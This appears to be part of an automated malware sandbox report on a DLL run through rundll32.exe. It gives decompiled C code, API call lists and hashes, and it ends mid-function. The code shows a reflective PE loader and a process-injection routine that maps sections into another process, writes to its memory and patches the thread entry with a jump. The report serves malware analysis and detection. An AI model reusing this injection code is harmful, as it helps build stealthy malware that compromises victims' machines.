0x10004fd6
0x10004fe5
0x10004fea
0x10004fee
0x10004ffd
0x10005006
0x10005008
0x1000500c
0x1000500d
0x1000500f
0x1000501a
0x1000502e
0x1000503d
0x10005041
0x1000504a
0x1000504e
0x10005058
0x1000506a
0x10005076
0x1000507b
0x00000000
0x1000500f
0x10004fa4
0x10004ee0
0x10004ee0
0x10004ee6
0x10004ee9
0x00000000
0x00000000
0x10004eeb
0x10004eef
0x100051dc
0x100051e1
0x100051e7
0x100051e8
0x100051e9
0x100051ed
0x100051fd
0x10005202
0x10005206
0x10005208
0x1000520c
0x10005211
0x10005213
0x10005215
0x1000521b
0x1000521b
0x10005228
0x1000522e
0x10005234
0x10005239
0x10005257
0x10005259
0x10005265
0x10005265
0x1000526b
0x1000526d
0x10005273
0x10005285
0x1000528b
0x10005297
0x1000529f
0x1000529f
0x1000529f
0x100052a1
0x100052a7
0x100052a7
0x10004ef5
0x10004ef8
0x00000000
0x00000000
0x00000000
0x10004ef8
0x10004ede
0x10004e21
0x10004e21
0x00000000
0x10004e21
0x10004d9d
0x10004da4
0x10004dad
0x10004daf
0x10004db5
0x10004df0
0x10004df0
0x00000000
0x10004dbb
0x10004dc6
0x10004dcf
0x10004dcf
0x10004ddb
0x10004de4
0x10004dee
0x00000000
0x00000000
0x00000000
0x10004dee

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC2
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC9
lstrcpynW.KERNEL32(02FF0068,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 10005257
lstrcpynW.KERNEL32(02FF0278,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 1000526B

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
Instruction ID: af7c25fddbaaac8c810623370fa574110a5ffa4de8c8a0639458766f2d690bf0
Opcode Fuzzy Hash: 286693d3f176852be07bbcfb61a8a188315f9be8f2c45d0ace0761040679fd0f
Instruction Fuzzy Hash: 02E1DBB1508341AFF300CF68CC85EABB3E9EB98394F414A2AF584C7295DB71ED448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AF7, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x10012b06
0x10012b0c
0x10012b15
0x10012b18
0x10012b1b
0x00000000
0x10012c0c
0x10012c10
0x10012c12
0x10012c20
0x10012d3e
0x10012d47
0x10012d4a
0x10012d4e
0x10012d54
0x10012d5c
0x10012d5c
0x10012d64
0x00000000
0x10012d6f
0x10012c26
0x10012c2f
0x10012c3d
0x10012c40
0x10012c5d
0x10012c64
0x10012c76
0x10012c76
0x10012c7d
0x10012c8d
0x10012ca5
0x10012c8f
0x10012c97
0x10012c97
0x10012ca8
0x10012cac
0x10012cbc
0x10012cdf
0x10012cf1
0x10012cbe
0x10012cd2
0x10012cd2
0x10012cfb
0x10012d17
0x10012cfd
0x10012d0c
0x10012d0c
0x10012d1f
0x10012d28
0x10012d28
0x10012d36
0x00000000
0x10012c7f
0x10012c81
0x00000000
0x10012c81
0x10012c7d
0x00000000
0x10012c40
0x10012b23
0x10012b31
0x10012b36
0x10012b41
0x10012b44
0x10012b48
0x10012b4a
0x10012b5a
0x10012b63
0x10012b6c
0x10012b74
0x10012b7d
0x10012b88
0x10012b8e
0x10012b91
0x10012b94
0x10012b9b
0x10012ba2
0x00000000
0x00000000
0x10012bad
0x10012bbb
0x10012bc6
0x10012bd0
0x10012be8
0x10012bf5
0x10012bf5
0x10012bd2
0x10012bdd
0x10012bdd
0x10012bfc
0x10012bfc
0x10012c04
0x10012c04
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C57
LoadLibraryA.KERNEL32(?), ref: 10012C70
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CCC
GetProcAddress.KERNEL32(00000000,?), ref: 10012CEB

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
Instruction ID: 40dbc58933749a0a0cd74d6661849015ce43e91b4c911e91057927375977fa56
Opcode Fuzzy Hash: 1dd9d1ec13e0e0c9236e88ac1c4924bd5e04187c8fc8866083520a7049e97579
Instruction Fuzzy Hash: F5A179B5A00219DFCB54CFA8C881AADBBF1FF08354F108569E915AB361D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4A5(_t41, 0);
				while(_t13 < 0) {
					E100097F2( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x306f878
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x306f878
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4A5(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A68F(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E100097F2(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009EEC(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4C1(_t48);
				E10008600( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x10001c68
0x10001c75
0x10001c77
0x10001c7e
0x10001ce4
0x10001c8b
0x10001c90
0x10001c96
0x10001c9b
0x10001ca1
0x10001ca3
0x10001ca7
0x10001d15
0x10001d17
0x10001d99
0x10001d9f
0x10001d9f
0x10001ca9
0x10001cb1
0x10001cb1
0x10001cbd
0x10001cc3
0x10001cc5
0x00000000
0x00000000
0x10001cc7
0x10001cd1
0x10001cd7
0x10001cdd
0x10001cdf
0x00000000
0x10001cdf
0x10001cab
0x10001caf
0x00000000
0x00000000
0x00000000
0x10001caf
0x10001cee
0x10001cef
0x10001cf0
0x10001cf1
0x10001cf2
0x10001cf7
0x10001d01
0x10001d06
0x10001d0e
0x10001d29
0x10001d2c
0x10001d36
0x10001d41
0x10001d54
0x10001d56
0x10001d58
0x10001d5a
0x10001d5b
0x10001d63
0x10001d64
0x10001d6a
0x10001d10
0x10001d10
0x10001d10
0x10001d6b
0x10001d76
0x10001d79
0x10001d7f
0x10001d85
0x10001d90
0x10001d97
0x00000000

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
Instruction ID: d906aae5790399c38ac9c36321e5d7763f5971439be1128eebad97b72ddd2630
Opcode Fuzzy Hash: d1b745fdbffcc919f21494d6dc9c505ee260cdefba6441b02a46ce43fb73c69e
Instruction Fuzzy Hash: E131B4366082A4AFF344DFA4DCC5C6E77A9FB983E0B904A2AF541D71A5DE30ED048752

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4A5(_t38, 0);
				while(_t12 < 0) {
					E100097F2( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x306f878
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x306f878
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4A5(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E100097F2(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009EEC(_t48);
				}
				if(_v24 != 0) {
					E10006876( &_v24);
				}
				_t26 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4C1(_t46);
				_t15 = _t61;
				goto L12;
			}

0x10001b2d
0x10001b33
0x10001b41
0x10001baf
0x10001b4e
0x10001b53
0x10001b59
0x10001b5e
0x10001b64
0x10001b66
0x10001b6a
0x10001c64
0x10001c64
0x10001b70
0x10001b70
0x10001b7c
0x10001b7c
0x10001b88
0x10001b8e
0x10001b90
0x00000000
0x10001b92
0x10001b92
0x10001b9c
0x10001ba2
0x10001ba8
0x10001baa
0x00000000
0x10001baa
0x10001b72
0x10001b72
0x10001b76
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b76
0x10001b70
0x10001c5d
0x10001c63
0x10001c63
0x10001bb8
0x10001bcc
0x10001bcf
0x10001bd9
0x10001be5
0x10001bef
0x10001bf0
0x10001bf1
0x10001bf2
0x10001bf7
0x10001c00
0x10001c04
0x10001c06
0x10001c07
0x10001c0f
0x10001c10
0x10001c16
0x10001c1b
0x10001c21
0x10001c21
0x10001c26
0x10001c31
0x10001c34
0x10001c3c
0x10001c48
0x10001c4b
0x10001c51
0x10001c56
0x10001c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32 ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32(00000000), ref: 10001BD9

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
Instruction ID: d1363189eadf394b0d6d3c5faf128b237252a217eef9a43260953257b15cddd2
Opcode Fuzzy Hash: 982b2c05f984020617e5bef145b75b34b208ca43f29a0efeb761dedb6e1fabef
Instruction Fuzzy Hash: 9C31AD796083A19FF704DF64CCD8D6E77A9EB983D0B408928F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10001A1B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10001A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t22;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t32;
				intOrPtr _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				intOrPtr _t54;
				char* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t64;
				CHAR* _t66;
				void* _t74;

				_t74 = __fp0;
				_t40 = __ecx;
				_t37 = __edx;
				_v12 = __ecx;
				_t57 =  *0x1001e6f0; // 0x0
				_push(_t60);
				_t61 = _t60 | 0xffffffff;
				_v16 = __edx;
				_t66 = _t61;
				if( *_t57 != 0) {
					L6:
					_t22 =  *0x1001e6fc; // 0x0
					_t72 = _t22;
					if(_t22 == 0) {
						goto L9;
					} else {
						_t24 = E1000160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
						_t66 = _t24;
						if(_t66 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_push(0x2d);
					_t39 = E10009E8B();
					_v20 = _t39;
					_t32 = E10009E4C(0x2e);
					_v8 = _t32;
					if(_t39 != 0 && _t32 != _t61) {
						_t54 =  *0x1001e6f0; // 0x0
						E100096B0(_t54, _t39, 0x100);
						 *0x1001e6fc = _v8;
					}
					E10008600( &_v20, _t61);
					_t57 =  *0x1001e6f0; // 0x0
					if( *_t57 == 0) {
						L9:
						_t38 = 0;
						_v8 = 0;
						_t23 = E10001778( &_v8, _t74);
						_v20 = _t23;
						__eflags = _t23;
						if(_t23 != 0) {
							__eflags = _v8;
							if(_v8 > 0) {
								_t13 =  &(_t23[4]); // 0x4
								_t64 = _t13;
								while(1) {
									__eflags =  *_t64;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t23,  *_t64);
										_t23 = E1000160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
										_t66 = _t23;
									}
									__eflags = _t66;
									if(_t66 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t64 = _t64 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t61 = _t64 | 0xffffffff;
								__eflags = _t61;
							}
							E10008600( &_v20, _v8);
						}
						__eflags = _t66;
						_t62 =  >=  ? _t66 : _t61;
						_t24 =  >=  ? _t66 : _t61;
					} else {
						_t37 = _v16;
						_t40 = _v12;
						goto L6;
					}
				}
				return _t24;
			}

0x10001a1b
0x10001a1b
0x10001a22
0x10001a24
0x10001a27
0x10001a2e
0x10001a2f
0x10001a32
0x10001a38
0x10001a3a
0x10001a95
0x10001a95
0x10001a9b
0x10001a9e
0x00000000
0x10001aa0
0x10001aa7
0x10001aac
0x10001ab2
0x00000000
0x00000000
0x10001ab4
0x10001ab2
0x10001a3c
0x10001a3c
0x10001a44
0x10001a48
0x10001a4b
0x10001a50
0x10001a56
0x10001a5c
0x10001a69
0x10001a72
0x10001a72
0x10001a7d
0x10001a82
0x10001a8d
0x10001ab6
0x10001ab6
0x10001abb
0x10001abe
0x10001ac3
0x10001ac6
0x10001ac8
0x10001aca
0x10001acd
0x10001acf
0x10001acf
0x10001ad2
0x10001ad2
0x10001ad5
0x10001adb
0x10001ae6
0x10001afa
0x10001b01
0x10001b01
0x10001b03
0x10001b05
0x00000000
0x00000000
0x10001b07
0x10001b08
0x10001b0b
0x10001b0e
0x00000000
0x00000000
0x00000000
0x10001b0e
0x10001b10
0x10001b10
0x10001b10
0x10001b1a
0x10001b20
0x10001b21
0x10001b23
0x10001b26
0x10001a8f
0x10001a8f
0x10001a92
0x00000000
0x10001a92
0x10001a8d
0x10001b2c

APIs

inet_ntoa.WS2_32(00000004), ref: 10001ADB
lstrcpynA.KERNEL32(?,00000000), ref: 10001AE6

Part of subcall function 100096B0: memset.MSVCRT ref: 100096D9

Strings

@}s, xrefs: 10001ADB

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: inet_ntoalstrcpynmemset
String ID: @}s
API String ID: 129148211-1738643329
Opcode ID: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
Instruction ID: bc20ad2b03a49fadc3bce8d2214928905f70a7fbf5e9e1e62064ea73bd786d80
Opcode Fuzzy Hash: 11795a285bf89cebb4f9c0d4940ad6dddf9e271b37e48aaca9a923e92fe3d613
Instruction Fuzzy Hash: CA31C936E04366ABFB01CFE4D881ADE77F5EB48390F21465AE510A72D5EB319E40CB94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6352 Parent PID: 796 rundll32.exeCOMMON

Executed Functions

Function 1000C6CB, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200
nativeregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E1000C6CB(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x87804a0
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E249(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x87ff9a0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E1000864F( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E10008600( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x87804a0
					 *0x1001e688 = _t131;
					E100086C7(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C64A(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}

APIs

NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CD4), ref: 1000C73E
RegisterClassExA.USER32(00000030), ref: 1000C790
CreateWindowExA.USER32 ref: 1000C7BB
DestroyWindow.USER32(00000000), ref: 1000C7C6
UnregisterClassA.USER32 ref: 1000C7D1
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7ED
NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7F7
NtMapViewOfSection.NTDLL(?,1000CBAB,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C81E
VirtualAllocEx.KERNELBASE(1000CBAB,00000000,00001AC4,00001000,00000004), ref: 1000C861
WriteProcessMemory.KERNELBASE(1000CBAB,00000000,00000000,00001AC4,?), ref: 1000C87A

Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646

GetCurrentProcess.KERNEL32(00000000), ref: 1000C8E6
NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8ED
NtClose.NTDLL(00000000), ref: 1000C900

Strings

cdcdwqwqwq, xrefs: 1000C775
sadccdcdsasa, xrefs: 1000C749
0, xrefs: 1000C758

Memory Dump Source

Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 2002808388-2319545179
Opcode ID: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
Instruction ID: d4ed6399113d3519698ced96f191084217c42ad0747b1462dfeddcfc8903a4cc
Opcode Fuzzy Hash: c33398d2d2482e1b44f2caf9b771938d6ed7ceb522d5affd1a3126bfae9fd242
Instruction Fuzzy Hash: 49713971900259AFEB11CF95CC88EAFBBB9FF49740F214469F605A7290D770AE04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB82, Relevance: 9.1, APIs: 6, Instructions: 105
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CB82(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4D9(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6CB( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t73[1],  &_v744) != 0) {
							_t70 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
